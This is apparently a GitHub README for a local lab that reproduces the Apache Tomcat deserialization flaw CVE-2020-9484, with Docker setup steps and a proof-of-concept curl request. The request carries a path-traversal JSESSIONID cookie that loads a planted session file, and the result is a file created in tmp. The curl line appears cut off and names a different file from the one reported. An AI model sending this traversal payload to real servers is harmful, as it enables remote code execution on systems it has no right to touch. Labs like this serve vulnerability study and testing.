Skip to content

Latest commit

 

History

History
14 lines (9 loc) · 411 Bytes

README.md

File metadata and controls

14 lines (9 loc) · 411 Bytes

Apache Tomcat Deserialization Vulnerability (CVE-2020-9484)

Vulnerable target setup

  • Clone this repository
  • Run docker-compose up -d
  • That's it !

Exploit POC

  • Run curl -v 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/cfx

poc

  • File named coldfx gets created in tmp directory